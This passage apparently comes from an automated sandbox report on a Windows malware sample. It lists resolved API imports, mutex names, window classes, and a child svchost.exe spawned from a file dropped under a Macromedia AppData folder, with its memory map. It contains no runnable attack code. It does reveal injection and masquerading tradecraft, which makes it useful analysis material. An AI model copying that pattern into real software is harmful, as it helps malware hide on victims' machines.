Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtCreateFile, address_out = 0x77cd00a4	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtClose, address_out = 0x77ccf9d0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryEaFile, address_out = 0x77cd1314	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtSetEaFile, address_out = 0x77cd19b0	1	Fn

Window (5)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Langskallet7	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 4923548	1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn

System (43)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 8000 milliseconds (8.000 seconds)	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (9)

Operation	Additional Information	Count	Logfile
Create	-	1	Fn
Create	mutex_name = C2E6ECE9938A43206F172A85684E36DB	1	Fn
Create	mutex_name = 4786CF0F1E6E9E20640CE4A22DFFC997	1	Fn
Create	mutex_name = 35D65C8FBCA06952705002450D6712FC	1	Fn
Open	mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE	1	Fn
Open	mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE	2	Fn
Open	mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE	2	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #16: svchost.exe

(Host: 1001, Network: 365)

Information	Value
ID	#16
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:05:12, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:05:01

OS Process Information

Information	Value
PID	0x320
Parent PID	0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7C4 0x 11C 0x 420 0x 318 0x 31C 0x 394 0x 310 0x 30C 0x 5B0 0x 7D0 0x 68C 0x 6BC 0x 650 0x 6E0 0x 478 0x 684 0x 464 0x 46C 0x 708 0x 704 0x 770

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0008bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x000f0000	0x0012bfff	Memory Mapped File	Readable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x00100000	0x00100fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000100000	0x00100000	0x00100fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	Readable, Writable	Region Actions
index.dat	0x00120000	0x0012ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
index.dat	0x00130000	0x0013bfff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00140000	0x00147fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00150000	0x0015ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000150000	0x00150000	0x0017ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001d0000	0x00236fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000250000	0x00250000	0x002cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002d0000	0x002d0000	0x0032ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x0033ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x003affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003c0000	0x003c0000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004d0000	0x004d0000	0x0050ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000520000	0x00520000	0x0055ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000570000	0x00570000	0x0057ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00707fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000710000	0x00710000	0x00890fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000008e0000	0x008e0000	0x0091ffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x00960000	0x00967fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000970000	0x00970000	0x01d6ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d70000	0x01d70000	0x02162fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002170000	0x02170000	0x023cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002170000	0x02170000	0x021affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021d0000	0x021d0000	0x0220ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002210000	0x02210000	0x0224ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002280000	0x02280000	0x022bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000022c0000	0x022c0000	0x022fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002300000	0x02300000	0x0233ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002350000	0x02350000	0x023cffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x023d0000	0x0269efff	Memory Mapped File	Readable	Region Actions
private_0x00000000026e0000	0x026e0000	0x0271ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002720000	0x02720000	0x0275ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002790000	0x02790000	0x027cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027d0000	0x027d0000	0x0280ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002810000	0x02810000	0x0284ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x0288ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028c0000	0x028c0000	0x028fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002950000	0x02950000	0x0298ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002990000	0x02990000	0x02b6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002990000	0x02990000	0x02a8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a90000	0x02a90000	0x02acffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b30000	0x02b30000	0x02b6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ba0000	0x02ba0000	0x02bdffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c00000	0x02c00000	0x02c3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c40000	0x02c40000	0x02deffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c40000	0x02c40000	0x02ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c50000	0x02c50000	0x02c8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ca0000	0x02ca0000	0x02cdffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ce0000	0x02ce0000	0x02ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002cf0000	0x02cf0000	0x02d9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002d50000	0x02d50000	0x02d8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002de0000	0x02de0000	0x02deffff	Private Memory	Readable, Writable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
